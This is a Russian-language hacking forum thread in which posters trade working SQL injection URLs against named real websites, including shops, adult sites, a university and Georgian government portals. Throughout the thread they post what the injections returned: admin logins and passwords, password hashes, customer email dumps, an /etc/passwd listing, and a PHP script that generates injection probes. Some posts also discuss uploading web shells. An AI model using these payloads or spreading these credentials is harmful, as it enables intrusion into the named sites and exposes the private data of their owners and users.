Сайт: www.haydamaky.com PR=4 Так и не смог найти таблицу в которой хрянится логин и пас к админке... Вот таблицы Админка
Code: http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/* я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?
http://www.devmaster.net/articles.php?catID=6+union+select+1,user()/* version() - 5.0.45 database() - Dia_Kharrat_dm_main user() - dia@localhost result: Reedbeta:fd50302fd2f3ef8f527465251903e4fa Dia Kharrat:5a69a0668268a34d04333c77d2970949 Anubis:75352e3845c8c6a61e52893ce8b178b0 Baldurk:8d761c44f8e4daef212ab80bb8875a6c Bladder:86c97024c1cb01ebdd09b4feeffdfa44
openit.com.ua Кста, там чувак есть с античата - inlanger пароль подходит тока на мыло Database Version: 5.0.22-log Database name: smat6_openit User name: smat@localhost Юзеры Проверил robots.txt блин, на бейсике... пароль из мускуль: admin : admin_admin кто найдет пасс к админке, стукните плз.. или пм
ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской Code: <?php for ($i=100; $i<108; $i++) { echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+"; for ($j=1; $j<=$i; $j++) { echo $j; if ($j!=$i) echo ","; }; echo "/*'>$i</a><br>"; } ?> Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа: Code: SELECT * FROM EVENT LEFT JOIN REGION ON (E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN BUNDESLAND ON (E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE E_ID=99999999 107!!! полей выборки, из которых нужны макс 20, бедный сервак. Ну и как результат Code: http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107+from+mysql.user/* Даже не закрыт доступ к db mysql...
mmogame.ru 70к+ валидных мэйликов пользуйтесь =): http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,LOAD_FILE(0x4579),5,6,7,email+from+mmo_users+limit+0,1000%20--%20&cat=1 Хэши паролей соленые(( http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,username,5,6,7,password+from+test_promoreklama.users+limit+0,1000%20--%20&cat=1 От базы проморекламы, хэши не соленые, на счету модера 130к+ деревянных, но у него пасс сцуко не шифруется - поэтому скул в паблик, кто откроет может поделится)... 4sexshop.ru Упал только что, а так вот хэш пароля админа http://www.4sexshop.ru/shop/goods/%20188999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat(0x3c2f7469746c653e3c68313e,%20%20pass,0x3c2f68313e),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+user.htm Админка: admin : ok (нубярко=) В админке можете поискать своего озабоченного друга, все данные о клиентах там есть вплоть до прописки
Это не странные хеши) это MD5(Unix) вроде) вот и сами хэши [email protected] : $1$LenAr$0GbWVUnw3liEE4HT4Gskm0 [email protected] : $1$LenAr$vpSwW7oIhLIYn6n5eLL2W. [email protected] : $1$LenAr$QGD8EMTZSpBkR72abB8Ak.
Paraavis.com - PR 4 5 версия, смотрим таблы.. увидев phpbb я сразу кинулся заливать шелл... но тут неудача.... аватарка не загружается и востановления бд не рабоатет...... planer;patagonia дальше.. я увидел таблы с IPB но сам форум так и не нашел... пасс и соль поидее.... какието юзеры.. еще юзеры.. Newprint.ru нелюблю я мелких...... но приходится) вот нужная там табла.. и колонка к ней... админка
www.scrapbookingmemories.com.au user(): [email protected] version(): 4.1.20 database(): showcase_sbm file_priv = Y но права поставлены так что не читаются файлы пользователей /etc/passwd читается, если верить /etc/redhat-release то система Red Hat Enterprise Linux ES release 4 (Nahant Update 5) http://www.scrapbookingmemories.com.au/scraproom/index.php?content=album&user=24377777777777+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,username,password,email),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/users/**/limit/**/2,1/*&coll=1003 count from users = 2874 пароли в чистом виде доп. инфо: /home/scrap/public_html/scraproom/global_includes/select.php Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin phpmyadmin:x:500:500::/home/phpmyadmin:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Сервер там Microsoft-IIS/6.0 стоит. Лови админку: http://www.newprint.ru/_admin/ Только чот она грузится долго( У меня такое чувство, то они специально "зашифровались" :-D ... По моему еще какой-то файлик идет после /_admin/ ... . Но путь админки - 100%
http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+from+us/*&sale=3&order= Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(
Для тех у кого уже руки трясутся =) http://putana.nu http://putana.nu/list.php?link=-30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* Login: rdvi02 Pass: 247580 http://sexrobot.ru http://sexrobot.ru/list.php?link=711+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://pentboy.ru http://pentboy.ru/list.php?link=34637+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://robosex.ru http://robosex.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://magdalina.ru http://magdalina.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://dosugspb.ru http://dosugspb.ru/list.php?link=37849+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://sexmodeli.org http://sexmodeli.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://sexmodeli.net http://sexmodeli.net/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://sexmodeli.ru http://sexmodeli.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://intimuslugi.org http://intimuslugi.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://intimuslugi.net http://intimuslugi.net/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://magdalina.org http://magdalina.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://intimdosug.org http://intimdosug.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://mskputana.ru http://mskputana.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://spbputana.ru http://spbputana.ru/list.php?link=37849+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580 http://dosugmsk.ru http://dosugmsk.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/* rdvi01:247580
админка http://www.remeco.ru/login.php но не работает все таблицы http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,table_name,3,4+from+information_schema.tables/**/limit/**/16,99999/*&sale=3&order= манагеры http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0x3a,name,login,pwd,mail),3,4+from+manager/*&sale=3&order= пользователи из user1 http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0x3a,id,name,mail,inn,passwd,score,status),3,4+from+user1/*&sale=3&order=
expert.com.ua (193.178.145.3) Яндекс тИЦ 1200 Path: /var/www/expert/expert.com.ua/index.php Database Version: 4.1.22-log Database name: expert User name: u_expert@localhost Привилегии файл запрещены (
ItLab.unn.ru - PR 5 Нижегородский государственный университет им.Н.И.Лобачевского. ЛАБОРАТОРИЯ ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ . Факультет вычислительной математики и кибернетики. 5 ветка и таблы.. админка юзеры из другой базы.. другие юзеры.. Software.unn.ac.ru software.unn.ac.ru/manager/ также сдесь: Unn.ru - PR 6 при регистрации можно залить шелл... токо исполнение не полное.. можно чтот придумать..
www.effective.net.ua Яндекс тИЦ - 30 version() = 4.0.27-log database() = effectiv_effe user() = effectiv_effe@localhost http://m2.com.ua 3 ветка http://www.kiis.com.ua version() = 5.0.37-log user() = [email protected] database() = kiis
www.naec.ge Examination Center provides Georgian http://www.naec.ge/more.php?t=links.php&f=20&su=semassessmentland&rig_no=1&id=-86'+union+select+1,2,3,4,5,6,7,8,concat(username,char(58),passwd),10,11+from+user+limit+0,1/*&lang=eng xarebava:naecge Login: xarebava Pass: naecge
http://www.mes.gov.ge/ Ministry of education and science of Georgia http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,id,user,pass,7+from+gov_password/* http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,concat(table_name,char(58),column_name,char(58),table_schema),5,6,7+from+information_schema.columns/* Login:mesarion Pass: yvancha